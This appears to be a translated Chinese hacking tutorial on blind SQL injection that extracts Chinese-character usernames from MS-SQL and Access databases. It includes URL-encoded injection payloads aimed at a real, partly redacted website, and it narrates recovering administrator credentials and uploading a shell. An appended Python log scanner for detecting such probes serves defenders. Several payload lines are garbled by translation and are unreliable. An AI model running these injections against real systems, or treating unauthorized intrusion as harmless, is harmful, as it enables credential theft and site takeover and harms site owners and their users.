Flying vest @ Ada Lab SEU
1. Guessing Chinese characters in MS-SQL
Under MS-SQL, Chinese characters hardly need to be guessed at all: as long as the condition you construct is good enough, the server will display the data directly in its error message. The common practice is to perform an operation of another type on the column whose content you want to obtain. An invalid type conversion then takes place during execution, the query fails and returns an error message, and the content you want is right there in that message. For example:
Select * from sysusers where [name] + 1 = 2
The name column is nvarchar, so forcing it into an addition must produce an error:
Syntax error converting the nvarchar value 'public' to a column of data type int.
The required information, here the value public, can be read directly from the returned error.
So guessing Chinese characters under MS-SQL requires no great effort.
2. Guessing Chinese characters in ACCESS
● Determining that a character is Chinese
This is very simple. If the website is Chinese and something odd happens during injection, you may suspect that the content is Chinese. Normally we determine it as follows:
... 0 <> (select count(*) from admin where left(xxx, 1) between char(20) and char(254)) ...
This only checks whether the character lies in the visible ASCII range. If a range that wide already gives trouble, try this:
... 0 <> (select count(*) from admin where left(xxx, 1) between char(254) and char(255)) ...
If this condition holds, unfortunately you have run into Chinese.
● Indirect guessing
If the content is Chinese, left and right on each item of the column do not split a Chinese character. That is, if a record reads "0我1", then:
Right(left(xxx, 1), 1) = 0
Right(left(xxx, 2), 1) = 我
Right(left(xxx, 3), 1) = 1
Someone immediately thought of converting the character to an integer to guess it, then converting back to find out which Chinese character it is. This works, and the idea is clever. The usual method is to construct the following condition:
Asc(right(left(xxx, N), 1)) < -XXXXX
From experience, the number on the right of the comparison should start below -10000; during the actual injection the result is then narrowed down step by step until a specific negative number remains. Once this negative number is determined, use a calculator to convert it to hexadecimal and then an editor to obtain the Chinese character. For example, if the integer you get is -10532, the calculator gives D6DC; enter it in hexadecimal mode in UltraEdit and you will see that D6DC is the character 周 ("week").
● Direct guessing
Just as with non-Chinese characters, you can use between to narrow the range step by step until you arrive at the exact Chinese character. The key to this method is understanding how between handles Chinese characters. At first I took some detours here; later, thanks to Overlord (46466397), I understood it thoroughly: unlike what I initially thought, between compares Chinese characters by their order in the Unicode encoding. I could not find a Unicode table on the Internet, so I made one under Overlord's guidance.
During guessing, the range is reduced step by step. To determine whether a character is Chinese, you can use between over the widest range to cover them all at once. For example, with the following condition it can be determined that the data to be guessed must be Chinese:
... Right(left(xxx, N), 1) between 一 and others
Since Unicode does not arrange Chinese characters by frequency of use, this actually makes guessing rather troublesome. Generally I prefer to write a program to guess. The time complexity of the two methods is the same, and it may be easier to write a program using the second method.
● Applicability
Both methods are applicable. However, the second method is the one generally used, and it does not work when filtering is in place. The first method should be very common for manual guessing. I also made a conversion tool that obtains the corresponding Chinese character directly from a negative integer.
● Others
Both methods are effective for guessing Far East characters and should work for all non-ASCII guessing. If you inject into Japanese or Korean, you can simply use the above method; only the encoding differs.
● Example
Www.jXXXXXX.org was tested last week (in good faith!). We first guessed a user whose password is 19831016. Through len we learned that the username length is 2 and determined that it consists of Chinese characters, then started guessing:
http://www.jXXXXXX.org/shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20password=19831016%20and%20asc(left(username,1))<-10000)
Confirm that the value is less than -10000, then narrow the range step by step, and finally determine that the value is -10532:
http://www.jXXXXXX.org/shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20password=19831016%20and%20asc(left(username,1))=-10532)
Open the calculator, choose scientific mode and convert the number to hexadecimal, which gives D6DC. Entering this in UltraEdit gives the character 周. Then I guessed the next character the other way, narrowing the range step by step:
http://www.jXXXXXX.org/shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20password=19831016%20and%20right(left(username,2),1)%20between%20not%20and%20)
Then confirm one by one, and finally obtain the character "last":
http://www.jXXXXXX.org/shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20password=19831016%20and%20right(left(username,2),1)=last)
Similarly, we guessed a super administrator's username and password. After logging in, we uploaded the shell and obtained management permission. It is not malicious; it just proves that a username and password made of Chinese characters will not bring you better security.
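The defender's side of the example above, as an added illustration that is not part of the original post or the author's conversion tool: a small Python scanner over constructed web-server log lines (the addresses, timestamps and log format are assumptions) that flags the "and 0<>(select count(*) from ...)" predicates used above, marks probes aimed at double-byte characters (negative Asc() thresholds or between char(254) and char(255)), and, when the probe is an equality test, reconstructs the character the attacker confirmed (here -10532 -> D6DC -> 周) so an analyst knows what was exposed.

```python
import re
from urllib.parse import unquote_plus
# Constructed combined-format access-log lines (not from the original post): one
# normal hit, then the probe shapes the post describes against an Access/ASP page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2004:10:01:02 +0800] "GET /shownews.asp?NewsID=264 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2004:10:01:05 +0800] "GET /shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20left(username,1)%20between%20char(254)%20and%20char(255)) HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2004:10:01:07 +0800] "GET /shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20asc(left(username,1))<-10000) HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2004:10:01:09 +0800] "GET /shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20asc(left(username,1))<-10500) HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2004:10:01:11 +0800] "GET /shownews.asp?NewsID=264%20and%200<>(select%20count(*)%20from%20admin%20where%20asc(left(username,1))=-10532) HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) ')
BLIND_RE = re.compile(r'\band\s+0\s*<>\s*\(\s*select\s+count\(\*\)\s+from\s+(?P<table>\w+)', re.I)  # the post's skeleton
COL_RE = re.compile(r'(?:right\s*\(\s*)?left\s*\(\s*(?P<col>\w+)\s*,\s*(?P<pos>\d+)', re.I)  # left(col,N) / right(left(col,N),1)
THRESH_RE = re.compile(r'asc\s*\([^)]*\)+\s*(?P<op>[<>=]+)\s*(?P<val>-?\d+)', re.I)  # asc(...) < -10000 narrows, = -10532 confirms
RANGE_RE = re.compile(r'between\s+char\s*\(\s*(?P<lo>\d+)\s*\)\s+and\s+char\s*\(\s*\d+\s*\)', re.I)  # between char(254) and char(255)

def asc_to_char(value):
    """Undo Access's Asc() on a double-byte character: the signed 16-bit result
    is the two GBK bytes, so -10532 -> 0xD6DC -> '周' as in the post."""
    return (value & 0xFFFF).to_bytes(2, 'big').decode('gbk', errors='replace')

def analyse_request(line):
    """Finding dict for a blind-injection probe, None for a normal request."""
    m = LOG_RE.match(line)
    query = unquote_plus(m['path']).partition('?')[2] if m else ''
    blind = BLIND_RE.search(query)
    if not blind:
        return None
    f = {'ip': m['ip'], 'table': blind['table'].lower(), 'column': None, 'position': None,
         'threshold': None, 'dbcs_probe': False, 'confirmed_char': None}
    col = COL_RE.search(query)
    if col:
        f['column'], f['position'] = col['col'].lower(), int(col['pos'])
    th = THRESH_RE.search(query)
    if th:
        f['threshold'] = int(th['val'])
        f['dbcs_probe'] = f['threshold'] < -128       # Asc() goes negative only for a DBCS lead byte
        if th['op'] == '=':                            # equality probe: the attacker already has the answer
            f['confirmed_char'] = asc_to_char(f['threshold'])
    rng = RANGE_RE.search(query)
    if rng and int(rng['lo']) >= 128:                  # range probe over the high bytes
        f['dbcs_probe'] = True
    return f

def scan_log(text):
    """All probe findings in log order; one source walking a threshold down on one column is the signature."""
    return [f for f in map(analyse_request, text.splitlines()) if f]
```

A run of requests from one source against one parameter with a steadily tightening asc() threshold is the pattern worth alerting on; at the application layer a parameterized query removes the injected predicate altogether.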